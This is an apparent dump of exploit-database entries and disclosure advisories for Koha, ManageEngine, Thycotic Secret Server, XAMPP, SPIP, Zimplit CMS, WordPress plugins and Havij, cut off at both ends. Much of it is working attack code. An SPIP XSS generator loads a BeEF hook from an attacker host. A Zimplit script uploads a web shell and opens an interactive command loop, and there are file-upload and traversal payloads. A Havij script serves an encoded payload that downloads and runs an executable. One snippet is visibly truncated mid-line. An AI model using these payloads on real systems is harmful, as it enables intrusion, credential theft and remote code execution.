* <= Koha 3.20.1
* <= Koha 3.18.8
* <= Koha 3.16.12
#### Fixed in version: ####
* version 3.20.1 http://koha-community.org/security-release-koha-3-20-1/,
* version 3.18.8 http://koha-community.org/security-release-koha-3-18-8/,
* version 3.16.12 http://koha-community.org/security-release-koha-3-16-12/
#### Vendor: ####
http://koha-community.org/ (Open Source)
#### CVE number: ####
CVE-2015-4632
#### Timeline ####
* `2015-06-18` identification of vulnerability
* `2015-06-18` 1st contact to release maintainer, immediate reply
* `2015-06-23` new release with fixed vulnerabilities
#### Credits: ####
RGhanad-Tavakoli@sba-research.org
---
Vulnerability Disclosure by Combinatorial Security Testing Group of SBA Research.
Contact: cst@sba-research.org
#### References:
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14408
http://koha-community.org/security-release-koha-3-20-1/
http://koha-community.org/security-release-koha-3-18-8/
http://koha-community.org/security-release-koha-3-16-12/
#### Description: ####
Multiple directory traversal vulnerabilities allow remote attackers to read arbitrary files via a .. (dot dot) in (1) /cgi-bin/koha/svc/virtualshelves/search and (2) in /cgi-bin/koha/svc/members/search
#### Proof-of-concept: ####
/cgi-bin/koha/svc/virtualshelves/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/cgi-bin/koha/svc/members/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
Title:
===============
ManageEngine Asset Explorer v6.1 - XSS Vulnerability
CVE-ID:
====================================
CVE-2015-2169
CVSS:
====================================
3.5
Product & Service Introduction (Taken from their homepage):
====================================
ManageEngine AssetExplorer is a web-based IT Asset Management (ITAM)
software that helps you monitor and manage assets in your network from
Planning phase to Disposal phase. AssetExplorer provides you with a number
of ways to ensure discovery of all the assets in your network. You can
manage software & hardware assets, ensure software license compliance and
track purchase orders & contracts - the whole nine yards! AssetExplorer is
very easy to install and works right out of the box.
(Homepage: https://www.manageengine.com/products/asset-explorer/ )
Abstract Advisory Information:
==============================
Cross site scripting attack can be performed on the manage engine asset
explorer. If the 'publisher' name contains vulnerable script, it gets
executed in the browser.
Affected Products:
====================
Manage Engine
Product: Asset Explorer - Web Application 6.1.0 (Build 6112)
Severity Level:
====================
Medium
Technical Details & Description:
================================
Add a vendor with a script in it to the registry.
Login to the product,
Scan the endpoint where the registry is modified.
In the right pane, go to software->Scanned Software
The script gets executed.
Vulnerable Product(s):
ManageEngine Asset Explorer
Affected Version(s):
Version 6.1.0 / Build Number 6112
(Earlier versions i did not test)
Vulnerability Type(s):
Persistent Cross Site Scripting
PoC:
=======================
Add the following registry entry in the machine, for targeted attack.
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fake_Software]
"DisplayName"="A fake software 2 installed"
"UninstallString"="C:\\Program Files\\fake\\uninst.exe"
"DisplayVersion"="0.500.20"
"URLInfoAbout"="http://www.dummy.org"
"Publisher"="<script> alert(\"XSS\"); </script>"
Security Risk:
==================
Medium.
Credits & Authors:
==================
Suraj Krishnaswami (suraj.krishnaswami@gmail.com)
Timeline:
==================
Discovered at Wed, March 3, 2015
Informed manage engine about the vulnerability: March 4, 2015
Case moved to development team: March 4, 2015
Asked for updates: March 9, 2015
Asked for updates: March 13, 2015
Asked for updates: April 14, 2015
Public Disclosure at Mon, June 22, 2015
#############################################################
#
# COMPASS SECURITY ADVISORY
# http://www.csnc.ch/en/downloads/advisories.html
#
#############################################################
#
# CVE ID : CVE-2015-3443
# Product: Secret Server [1]
# Vendor: Thycotic
# Subject: Stored Cross-Site Scripting Vulnerability (XSS)
# Risk: High
# Effect: Remotely exploitable
# Author: Marco Delai (marco.delai@csnc.ch)
# Date: June 24th 2015
#
#############################################################
Introduction:
-------------
Thycotic Secret Server enterprise password management software allows
the creation, management and control of critical passwords in one
centralized, web-based repository [1].
The identified vulnerability (stored Cross-Site Scripting) allows the
execution of JavaScript code in the browser of a valid user when it
toggle the password mask on a specially crafted password. This allows,
for example, an attacker to prepare a specially crafted shared password,
which when read by another user, can steal all other passwords the
victim has access to.
Vulnerable:
-----------
Secret Server customers on version 8.6.000000 to 8.8.000004 [2].
Technical Details
--------------------
Exploiting the vulnerability simply requires to:
1. Create a new password entry within Secret Server with the following
value: "Compass Security<script>alert("Compass Security")</script>"
2. Open the basic dashboard and toggle the password mask. The password
is retrieved from the server using an AJAX call and its value is
added straight to the page's DOM without validation. Thus, the
script included in step 1 is executed.
Note that the payload defined in step 1 did only get executed in the
basic dashboard view. The advanced dashboard did adequately encode the
password. Extract of the vulnerable page:
GET
/SecretServer/api.ashx/simplehome/GetSecretItemValue?secretItemId=[...]&audi
tAction=unmask HTTP/1.1
HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Content-Length: 62
Content-Type: application/json; charset=utf-8
Expires: -1
[...]
Content-Security-Policy: connect-src 'self'; font-src 'self';
frame-src 'self' sslauncher:; img-src 'self' data:; media-src 'self';
object-src 'self'; style-src 'self' 'unsafe-inline'; script-src 'self'
'unsafe-inline' 'unsafe-eval'
X-Content-Security-Policy: connect-src 'self'; font-src 'self';
frame-src 'self' sslauncher:; img-src 'self' data:; media-src 'self';
object-src 'self'; style-src 'self' 'unsafe-inline'; script-src 'self'
'unsafe-inline' 'unsafe-eval'
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
X-UA-Compatible: IE=edge
"Compass Security<script>alert(\"Compass Security\")</script>"
Remediation:
------------
Update Secret Server to the latest version, which fixes the
vulnerability [2].
Milestones:
-----------
2015-02-19 Vulnerability discovered
2015-02-20 Vulnerability reported to vendor
2015-02-20 Vendor patch [2]
2015-06-24 Public disclosure
References:
-----------
[1] http://thycotic.com/products/secret-server/
[2]
http://thycotic.com/products/secret-server/resources/advisories/thy-ss-004/
source: https://www.securityfocus.com/bid/53979/info
XAMPP for Windows is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/xampp/perlinfo.pl/"<script>alert("XSS")</script>
http://www.example.com/xampp/cds.php/%27onmouseover=alert%28%22XSS%22%29%3E
http://www.example.com/xampp/cds.php?interpret=1&jahr=1967 and sleep(1) &titel=555-666-0606
source: https://www.securityfocus.com/bid/53983/info
SPIP is prone to multiple unspecified cross-site-scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Versions prior to SPIP 2.0.20, 2.1.15, and 3.0.2 are vulnerable.
Exploit generator:
------------------
<html>
<head>
<script>
function trim(s){
return s.replace(/\r\n|\r|\n|\t/g,'').replace(/^\s+/g,'').replace(/\s+$/g,'');
}
function encodeToHex(s){
var r="";
var h;
for(var c=0;c<s.length;c++){
h=s.charCodeAt(c).toString(16);
while(h.length<3) h="%"+h;
r+=h;
}
return r;
}
function generateXSS(){
var target = trim(document.getElementById("target").value);
var version = trim(document.getElementById("version").value);
var content = trim(document.getElementById("content").value);
var resultjs = "";
resultjs += "<html><body><form name='x' action='" + target + "ecrire/?exec=" + version + "' method='post'>";
resultjs += "<input type='hidden' name='exec' value='" + version + "' />";
resultjs += "<input type='hidden' name=\"x'><script>eval(unescape('" + encodeToHex(content) + "'));<\/script><input=\" value='' />";
resultjs += "</form><script>document.forms['x'].submit();<\/script></body></html>";
document.getElementById("resultjs").value = resultjs;
}
</script>
</head>
<body onload="generateXSS();">
<h2>XSS in SPIP Core <=3.0.1 or <=2.1.14 admin panel (base repair)</h2>
<p>
This XSS, non-persistent, use POST vars through admin panel.<br />
The target is the attribute "name" of an input markup hidden.<br />
This XSS work on Firefox 13, IE7, but doesn't work on Chrome.<br />
Magic_quote_gcp = Off needed.
</p>
<form action="" onsubmit="generateXSS();return false;">
<table>
<tr>
<td>URL's SPIP Targeted :</td>
<td><input id="target" type="text" value="http://target/spip/" size="70" onkeyup="generateXSS();" /></td>
</tr>
<tr>
<td>SPIP version :</td>
<td>
<select id="version" onchange="generateXSS();">
<option value="base_repair">3.0.X (up to 3.0.1 included)</option>
<option value="admin_repair">2.1.X (up to 2.1.14 included)</option>
</select>
</td>
</tr>
<tr>
<td>JavaScript code to execute :<br />(without <script> & </script> markup)</td>
<td>
<textarea cols="70" rows="10" id="content" onkeyup="generateXSS();">
alert(document.cookie);
var script = document.createElement("script");
script.type = "text/javascript";
script.src = "http://ha.ck.er.xxx/beEf.js";
document.body.appendChild(script);
</textarea>
</td>
</tr>
<tr>
<td>Exploit to send to an admin : </td>
<td>
<textarea cols="70" rows="10" id="resultjs" readonly="readonly"></textarea>
</td>
</tr>
</table>
</form>
</body>
</html>
source: https://www.securityfocus.com/bid/53990/info
Zimplit CMS is prone to multiple local file-include vulnerabilities and an arbitrary file-upload vulnerability.
An attacker can exploit these issues to upload arbitrary files onto the web server, execute arbitrary local files within the context of the web server, and obtain sensitive information.
Zimplit CMS 3.0 is vulnerable; other versions may also be affected.
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0 0
1 ######################################### 1
0 I'm KedAns-Dz member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
###
# Title : Zimplit CMS v3.0 <= (FU/XSRF/LFI) Multiple Vulnerabilities
# Author : KedAns-Dz
# E-mail : ked-h (@hotmail.com / @1337day.com / @exploit-id.com / @dis9.com)
# Home : Hassi.Messaoud (30500) - Algeria -(00213555248701)
# Web Site : www.1337day.com | www.inj3ct0rs.com
# FaCeb0ok : http://fb.me/Inj3ct0rK3d
# Friendly Sites : www.r00tw0rm.com * www.exploit-id.com * www.dis9.com
# platform : php
# Type : Multiple Vulnerabilities
# Tested on : Windows XP-SP3 (Fr) / Ubuntu 10.10 (En)
# Download : [http://www.zimplit.com/order.html]
###
# <3 <3 Greetings t0 Palestine <3 <3
# Exploit's / p0c's ====>
##### Exp(1) Arbitrary File/Shell Upload =>
<!-- p0c (1) -->
<?php
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
while (!$sock)
{
print "\n[-] No response from {$host}:80 Trying again...";
$sock = fsockopen($host, 80);
}
fputs($sock, $packet);
while (!feof($sock)) $resp .= fread($sock, 1024);
fclose($sock);
return $resp;
}
print "\n|==================================================|";
print "\n| Zimplit CMS v3.0 <= Arbitrary Shell Upload |";
print "\n| Provided By KedAns-Dz <ked-h[at]hotmail[.]com> |";
print "\n|==================================================|\n";
if ($argc < 2)
{
print "\nUsage : php $argv[0] [host] [path]";
print "\nExample : php $argv[0] www.p0c.tld /zimplit/\n";
die();
}
$host = $argv[1];
$path = $argv[2];
$data = "--31337\r\n";
$data .= "Content-Disposition: form-data; name=\"File\"; filename=\"k3d.php\"\r\n";
$data .= "Content-Type: application/octet-stream\r\n\r\n";
$data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\n";
$data .= "--31337--\r\n";
$packet = "POST {$path}/zimplit.php?action=upload&folder=editor/files HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($data)."\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=31337\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $data;
preg_match("/OnUploadCompleted\((.*),\"(.*)\",\"(.*)\",/i", http_send($host, $packet), $html);
if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]})\n");
else print "\n[-] Shell uploaded to {$html[2]}...starting it!\n";
define(STDIN, fopen("php://stdin", "r"));
while(1)
{
print "\n Inj3ct0rK3d-Sh3lL#";
$cmd = trim(fgets(STDIN)); # f.ex : C:\\k3d.php
if ($cmd != "exit")
{
$packet = "GET {$path}k3d.php{$html[3]} HTTP/1.0\r\n";
$packet.= "Host: {$host}\r\n";
$packet.= "Cmd: ".base64_encode($cmd)."\r\n"; # for Encoded You'r Shell
$packet.= "Connection: close\r\n\r\n";
$output = http_send($host, $packet);
if (eregi("print", $output) || !eregi("_code_", $output)) die("\n[-] Exploit failed...\n");
$shell = explode("_code_", $output);
print "\n{$shell[1]}";
}
else break;
}
?>
<!-- p0c (2) -->
<form action="http://[Target]/zimplit.php?action=upload&folder=editor/files" method="post">
<input type="file" name="file" size="50"/>
<input type="hidden" name="file" />
<input type="submit" value="Upload Sh3ll/File !" />
</form>
[+] Access Shell http://[Target]/editor/files/k3d.php
[+] Access Shell http://[Target]/editor/files/{ U R Shell }.*
##### Exp(2) Edit HTML (index.html) File =>
<form action='http://[target]/zimplit.php?action=save&file=index.html' method='post'>
<textarea id="html" name="html">
<center>
<h1> HaCked By KedAns-Dz </h1>
</center>
</textarea>
<input type='submit' value='Edit HTML Page'>
</form>
##### Exp(3) Add new HTML File/Page =>
<form action='http://[target]/zimplit.php?action=new&file=dz0.html' method='post'>
<textarea id="html" name="html">
<center>
<h1> HaCked By KedAns-Dz </h1>
</center>
</textarea>
<input type='submit' value='Creat new HTML Page'>
</form>
##### Exp(4) Local File Include =>
<!-- p0c (1) -->
<form action='http://[target]/zimplit.php?action=load&file=../../../../../../../[ LFI ]%00' method='post'>
<input type='submit' value='Included Local File'>
</form>
<!-- p0c (2) -->
<?php
$lfi =
curl_init("http://[Target]/editor/zimplit_js.php");
curl_setopt($lfi, CURLOPT_POST, true);
curl_setopt($lfi, CURLOPT_POSTFIELDS,
array('lang'=>"../../../../../../../../[ LFI ]%00"));
curl_setopt($lfi, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($lfi);
curl_close($lfi);
print "$postResult";
?>
<!-- p0c (3) -->
<?php
$lfi =
curl_init("http://[Target]/editor/user.php");
curl_setopt($lfi, CURLOPT_POST, true);
curl_setopt($lfi, CURLOPT_POSTFIELDS,
array('lang'=>"../../../../../../../../[ LFI ]%00"));
curl_setopt($lfi, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($lfi);
curl_close($lfi);
print "$postResult";
?>
#### << ThE|End
#================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]===============================================
# Greets To : Dz Offenders Cr3w < Algerians HaCkerS > | Caddy-Dz * Mennouchi Islem * Rizky Oz * HMD-Cr3w
# +> Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (1337day.com) * CrosS (r00tw0rm.com)
# Inj3ct0r Members 31337 : Indoushka * KnocKout * SeeMe * Kalashinkov3 * ZoRLu * anT!-Tr0J4n * Angel Injection
# NuxbieCyber (www.1337day.com/team) * Dz Offenders Cr3w * Algerian Cyber Army * xDZx * TM.mOsta * HD Moore
# Exploit-ID Team : jos_ali_joe + Caddy-Dz + kaMtiEz + r3m1ck (exploit-id.com) * Jago-dz * Over-X * KeyStr0ke
# JF * Kha&miX * Ev!LsCr!pT_Dz * KinG Of PiraTeS * TrOoN * T0xic * L3b-r1Z * Chevr0sky * Black-ID * Barbaros-DZ
# packetstormsecurity.org * metasploit.com * r00tw0rm.com * OWASP Dz * Dis9-UE * All Security and Exploits Webs
#============================================================================================================
source: https://www.securityfocus.com/bid/53994/info
Evarisk plugin for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
Evarisk 5.1.5.4 is vulnerable; other versions may also be affected.
<?php
$headers = array("Content-Type: application/octet-stream");
$uploadfile="<?php phpinfo(); ?>";
$ch = curl_init("http://www.example.com/wordpress/wp-content/plugins/evarisk/include/lib/actionsCorrectives/activite/uploadPhotoApres.php?qqfile=lo.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, @$uploadfile);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
#!/usr/bin/php
<?php
# Title : Havij OLE Automation Array Remote Code Execution
# Affected Versions: All Version
# Founder : ITSecTeam
# Tested on Windows 7 / Server 2008
#
#
# Author : Mohammad Reza Espargham
# Linkedin : https://ir.linkedin.com/in/rezasp
# E-Mail : me[at]reza[dot]es , reza.espargham[at]gmail[dot]com
# Website : www.reza.es
# Twitter : https://twitter.com/rezesp
# FaceBook : https://www.facebook.com/mohammadreza.espargham
#
#
# OleAut32.dll Exploit MS14-064 CVE2014-6332
#
#
# 1 . run php code : php havij.php
# 2 . open "Havij" and Enter your exploit link http://ipaddress:80/
# 3 . go to "Setting" and Click "Load Cookie"
# 4 . Your Link Download/Execute on your target
# 5 . Finished ;)
#Youtube : https://www.youtube.com/watch?v=svU8SuJhaVY
$port=80; # Port Address
$link="http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe"; # Your exe link
$reza = socket_create(AF_INET, SOCK_STREAM, 0) or die('Failed to create socket!');
socket_bind($reza, 0,$port);
socket_listen($reza);
print " Mohammad Reza Espargham\n www.reza.es\n\nYour Link = http://ipaddress:$port / http://127.0.0.1:$port\n\n";
$msg = 'PGh0bWw+CjxtZXRhIGh0dHAtZXF1aXY9IlgtVUEtQ29tcGF0aWJsZSIgY29udGVudD0iSUU9RW11
bGF0ZUlFOCIgPgo8aGVhZD4KPC9oZWFkPgo8Ym9keT4KIAo8U0NSSVBUIExBTkdVQUdFPSJWQlNj
cmlwdCI+CgpmdW5jdGlvbiBydW5tdW1hYSgpIApPbiBFcnJvciBSZXN1bWUgTmV4dApzZXQgc2hl
bGw9Y3JlYXRlb2JqZWN0KCJTaGVsbC5BcHBsaWNhdGlvbiIpCmNvbW1hbmQ9Ikludm9rZS1FeHBy
ZXNzaW9uICQoTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudCkuRG93bmxvYWRGaWxlKCdG
SUxFX0RPV05MT0FEJywnbG9hZC5leGUnKTskKE5ldy1PYmplY3QgLWNvbSBTaGVsbC5BcHBsaWNh
dGlvbikuU2hlbGxFeGVjdXRlKCdsb2FkLmV4ZScpOyIKc2hlbGwuU2hlbGxFeGVjdXRlICJwb3dl
cnNoZWxsLmV4ZSIsICItQ29tbWFuZCAiICYgY29tbWFuZCwgIiIsICJydW5hcyIsIDAKZW5kIGZ1
bmN0aW9uCjwvc2NyaXB0PgogCjxTQ1JJUFQgTEFOR1VBR0U9IlZCU2NyaXB0Ij4KICAKZGltICAg
YWEoKQpkaW0gICBhYigpCmRpbSAgIGEwCmRpbSAgIGExCmRpbSAgIGEyCmRpbSAgIGEzCmRpbSAg
IHdpbjl4CmRpbSAgIGludFZlcnNpb24KZGltICAgcm5kYQpkaW0gICBmdW5jbGFzcwpkaW0gICBt
eWFycmF5CiAKQmVnaW4oKQogCmZ1bmN0aW9uIEJlZ2luKCkKICBPbiBFcnJvciBSZXN1bWUgTmV4
dAogIGluZm89TmF2aWdhdG9yLlVzZXJBZ2VudAogCiAgaWYoaW5zdHIoaW5mbywiV2luNjQiKT4w
KSAgIHRoZW4KICAgICBleGl0ICAgZnVuY3Rpb24KICBlbmQgaWYKIAogIGlmIChpbnN0cihpbmZv
LCJNU0lFIik+MCkgICB0aGVuIAogICAgICAgICAgICAgaW50VmVyc2lvbiA9IENJbnQoTWlkKGlu
Zm8sIEluU3RyKGluZm8sICJNU0lFIikgKyA1LCAyKSkgICAKICBlbHNlCiAgICAgZXhpdCAgIGZ1
bmN0aW9uICAKICAgICAgICAgICAgICAKICBlbmQgaWYKIAogIHdpbjl4PTAKIAogIEJlZ2luSW5p
dCgpCiAgSWYgQ3JlYXRlKCk9VHJ1ZSBUaGVuCiAgICAgbXlhcnJheT0gICAgICAgIGNocncoMDEp
JmNocncoMjE3NikmY2hydygwMSkmY2hydygwMCkmY2hydygwMCkmY2hydygwMCkmY2hydygwMCkm
Y2hydygwMCkKICAgICBteWFycmF5PW15YXJyYXkmY2hydygwMCkmY2hydygzMjc2NykmY2hydygw
MCkmY2hydygwKQogCiAgICAgaWYoaW50VmVyc2lvbjw0KSB0aGVuCiAgICAgICAgIGRvY3VtZW50
LndyaXRlKCI8YnI+IElFIikKICAgICAgICAgZG9jdW1lbnQud3JpdGUoaW50VmVyc2lvbikKICAg
ICAgICAgcnVuc2hlbGxjb2RlKCkgICAgICAgICAgICAgICAgICAgIAogICAgIGVsc2UgIAogICAg
ICAgICAgc2V0bm90c2FmZW1vZGUoKQogICAgIGVuZCBpZgogIGVuZCBpZgplbmQgZnVuY3Rpb24K
IApmdW5jdGlvbiBCZWdpbkluaXQoKQogICBSYW5kb21pemUoKQogICByZWRpbSBhYSg1KQogICBy
ZWRpbSBhYig1KQogICBhMD0xMysxNypybmQoNikKICAgYTM9NyszKnJuZCg1KQplbmQgZnVuY3Rp
b24KIApmdW5jdGlvbiBDcmVhdGUoKQogIE9uIEVycm9yIFJlc3VtZSBOZXh0CiAgZGltIGkKICBD
cmVhdGU9RmFsc2UKICBGb3IgaSA9IDAgVG8gNDAwCiAgICBJZiBPdmVyKCk9VHJ1ZSBUaGVuCiAg
ICAgICBDcmVhdGU9VHJ1ZQogICAgICAgRXhpdCBGb3IKICAgIEVuZCBJZiAKICBOZXh0CmVuZCBm
dW5jdGlvbgogCnN1YiB0ZXN0YWEoKQplbmQgc3ViCiAKZnVuY3Rpb24gbXlkYXRhKCkKICAgIE9u
IEVycm9yIFJlc3VtZSBOZXh0CiAgICAgaT10ZXN0YWEKICAgICBpPW51bGwKICAgICByZWRpbSAg
UHJlc2VydmUgYWEoYTIpICAKICAgCiAgICAgYWIoMCk9MAogICAgIGFhKGExKT1pCiAgICAgYWIo
MCk9Ni4zNjU5ODczNzQzNzgwMUUtMzE0CiAKICAgICBhYShhMSsyKT1teWFycmF5CiAgICAgYWIo
Mik9MS43NDA4ODUzNDczMTMyNEUtMzEwICAKICAgICBteWRhdGE9YWEoYTEpCiAgICAgcmVkaW0g
IFByZXNlcnZlIGFhKGEwKSAgCmVuZCBmdW5jdGlvbiAKIAogCmZ1bmN0aW9uIHNldG5vdHNhZmVt
b2RlKCkKICAgIE9uIEVycm9yIFJlc3VtZSBOZXh0CiAgICBpPW15ZGF0YSgpICAKICAgIGk9cnVt
KGkrOCkKICAgIGk9cnVtKGkrMTYpCiAgICBqPXJ1bShpKyZoMTM0KSAgCiAgICBmb3Igaz0wIHRv
ICZoNjAgc3RlcCA0CiAgICAgICAgaj1ydW0oaSsmaDEyMCtrKQogICAgICAgIGlmKGo9MTQpIHRo
ZW4KICAgICAgICAgICAgICBqPTAgICAgICAgICAgCiAgICAgICAgICAgICAgcmVkaW0gIFByZXNl
cnZlIGFhKGEyKSAgICAgICAgICAgICAKICAgICBhYShhMSsyKShpKyZoMTFjK2spPWFiKDQpCiAg
ICAgICAgICAgICAgcmVkaW0gIFByZXNlcnZlIGFhKGEwKSAgCiAKICAgICBqPTAgCiAgICAgICAg
ICAgICAgaj1ydW0oaSsmaDEyMCtrKSAgIAogICAgICAgICAgCiAgICAgICAgICAgICAgIEV4aXQg
Zm9yCiAgICAgICAgICAgZW5kIGlmCiAKICAgIG5leHQgCiAgICBhYigyKT0xLjY5NzU5NjYzMzE2
NzQ3RS0zMTMKICAgIHJ1bm11bWFhKCkgCmVuZCBmdW5jdGlvbgogCmZ1bmN0aW9uIE92ZXIoKQog
ICAgT24gRXJyb3IgUmVzdW1lIE5leHQKICAgIGRpbSB0eXBlMSx0eXBlMix0eXBlMwogICAgT3Zl
cj1GYWxzZQogICAgYTA9YTArYTMKICAgIGExPWEwKzIKICAgIGEyPWEwKyZoODAwMDAwMAogICAK
ICAgIHJlZGltICBQcmVzZXJ2ZSBhYShhMCkgCiAgICByZWRpbSAgIGFiKGEwKSAgICAgCiAgIAog
ICAgcmVkaW0gIFByZXNlcnZlIGFhKGEyKQogICAKICAgIHR5cGUxPTEKICAgIGFiKDApPTEuMTIz
NDU2Nzg5MDEyMzQ1Njc4OTAxMjM0NTY3ODkwCiAgICBhYShhMCk9MTAKICAgICAgICAgICAKICAg
IElmKElzT2JqZWN0KGFhKGExLTEpKSA9IEZhbHNlKSBUaGVuCiAgICAgICBpZihpbnRWZXJzaW9u
PDQpIHRoZW4KICAgICAgICAgICBtZW09Y2ludChhMCsxKSoxNiAgICAgICAgICAgICAKICAgICAg
ICAgICBqPXZhcnR5cGUoYWEoYTEtMSkpCiAgICAgICAgICAgaWYoKGo9bWVtKzQpIG9yIChqKjg9
bWVtKzgpKSB0aGVuCiAgICAgICAgICAgICAgaWYodmFydHlwZShhYShhMS0xKSk8PjApICBUaGVu
ICAgIAogICAgICAgICAgICAgICAgIElmKElzT2JqZWN0KGFhKGExKSkgPSBGYWxzZSApIFRoZW4g
ICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICB0eXBlMT1WYXJUeXBlKGFhKGExKSkKICAg
ICAgICAgICAgICAgICBlbmQgaWYgICAgICAgICAgICAgICAKICAgICAgICAgICAgICBlbmQgaWYK
ICAgICAgICAgICBlbHNlCiAgICAgICAgICAgICByZWRpbSAgUHJlc2VydmUgYWEoYTApCiAgICAg
ICAgICAgICBleGl0ICBmdW5jdGlvbgogCiAgICAgICAgICAgZW5kIGlmIAogICAgICAgIGVsc2UK
ICAgICAgICAgICBpZih2YXJ0eXBlKGFhKGExLTEpKTw+MCkgIFRoZW4gICAgCiAgICAgICAgICAg
ICAgSWYoSXNPYmplY3QoYWEoYTEpKSA9IEZhbHNlICkgVGhlbgogICAgICAgICAgICAgICAgICB0
eXBlMT1WYXJUeXBlKGFhKGExKSkKICAgICAgICAgICAgICBlbmQgaWYgICAgICAgICAgICAgICAK
ICAgICAgICAgICAgZW5kIGlmCiAgICAgICAgZW5kIGlmCiAgICBlbmQgaWYKICAgICAgICAgICAg
ICAgCiAgICAgCiAgICBJZih0eXBlMT0maDJmNjYpIFRoZW4gICAgICAgICAKICAgICAgICAgIE92
ZXI9VHJ1ZSAgICAgIAogICAgRW5kIElmICAKICAgIElmKHR5cGUxPSZoQjlBRCkgVGhlbgogICAg
ICAgICAgT3Zlcj1UcnVlCiAgICAgICAgICB3aW45eD0xCiAgICBFbmQgSWYgIAogCiAgICByZWRp
bSAgUHJlc2VydmUgYWEoYTApICAgICAgICAgIAogICAgICAgICAKZW5kIGZ1bmN0aW9uCiAKZnVu
Y3Rpb24gcnVtKGFkZCkgCiAgICBPbiBFcnJvciBSZXN1bWUgTmV4dAogICAgcmVkaW0gIFByZXNl
cnZlIGFhKGEyKSAgCiAgIAogICAgYWIoMCk9MCAgIAogICAgYWEoYTEpPWFkZCs0ICAgICAKICAg
IGFiKDApPTEuNjk3NTk2NjMzMTY3NDdFLTMxMyAgICAgICAKICAgIHJ1bT1sZW5iKGFhKGExKSkg
IAogICAgCiAgICBhYigwKT0wCiAgICByZWRpbSAgUHJlc2VydmUgYWEoYTApCmVuZCBmdW5jdGlv
bgogCjwvc2NyaXB0PgogCjwvYm9keT4KPC9odG1sPg==';
$msgd=base64_decode($msg);
$msgd=str_replace("FILE_DOWNLOAD",$link,$msgd);
for (;;) {
if ($client = @socket_accept($reza)) {
socket_write($client, "HTTP/1.1 200 OK\r\n" .
"Content-length: " . strlen($msgd) . "\r\n" .
"Content-Type: text/html; charset=UTF-8\r\n\r\n" .
$msgd);
print "\n Target Checked Your Link \n";
}
else usleep(100000);
}
?>
source: https://www.securityfocus.com/bid/53995/info
Invit0r plugin for WordPress is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
An attacker can exploit this vulnerability to upload arbitrary code and run it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
Invit0r 0.22 is vulnerable; other versions may also be affected.
ders = array("Content-Type: application/octet-stream");
$uploadfile="<?php phpinfo(); ?>";
$ch = curl_init("http://www.example.com/wordpress/wp-content/plugins/invit0r/lib/php-ofc-library/ofc_upload_image.php?name=lo.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, @$uploadfile);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
source: https://www.securityfocus.com/bid/53998/info
MediaWiki is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
